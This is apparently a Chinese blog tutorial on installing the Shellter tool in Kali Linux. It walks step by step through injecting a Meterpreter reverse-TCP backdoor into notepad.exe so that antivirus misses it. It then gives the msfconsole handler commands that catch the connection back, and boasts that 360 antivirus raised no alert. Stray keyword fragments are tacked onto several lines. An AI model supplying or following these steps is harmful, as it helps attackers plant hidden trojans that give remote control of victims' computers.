Shellter 是一款動態 shellcode 注入工具,咱們能夠將shellcode注入到其它程序上,從而來躲避殺毒軟件的查殺。俗稱爲免殺linux
官網:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件因此在windows下能夠直接使用,在linux上運行的話shell
就須要安裝wine環境來運行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可執行文件windows
開始安裝:tcp
1. apt-get update //更新一下
2. apt-get install shellter //直接apt在線安裝工具
安裝完成後 ,終端直接輸入shellter打開會報錯,根據提示 咱們直接執行命令 dpkg --add-architecture i386 && apt-get update && apt-get install wine32spa
確認安裝便可code
如今咱們打開shellter就能夠打開運行了,工具安裝完成後再/usr/share/windows-resources/shellter 這個文件夾blog
shellter目錄下的Shellter_Backups文件夾是你注入文件後備份的文件夾,會自動把原文件備份一個到這個文件夾下。get
免殺實驗:it
Choose Operation Mode - Auto/Manual (A/M/H):A //選擇模式 A 自動模式自動注入後門,M高級模式,H幫助
PE Target:/home/notepad.exe // 注入的程序 這裏已windows系統自帶的32位記事本程序舉例
Enable Stealth Mode? (Y/N/H): Y //是否啓用隱身模式 輸入Y啓用
Use a listed payload or custom? (L/C/H): L //使用攻擊模塊列表或者自定義? 輸入L 選擇Payload
Select payload by index: 1 //選擇第一個
SET LHOST: 192.168.37.137 //設置反彈回來的IP 本機
SET LPORT:4444 //設置接收反彈的端口
這樣咱們的木馬後門shellcode就注入到這個文件裏去了,
開啓360所有查殺引擎,更新病毒庫,查殺一下試試效果,沒有任何提示。
打開msf,進行配置,
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.37.137 set lport 4444 exploit //監聽
這時運行帶有後門的notepad.exe文件後,控制端成功鏈接上來,接下來就能夠隨意操做了。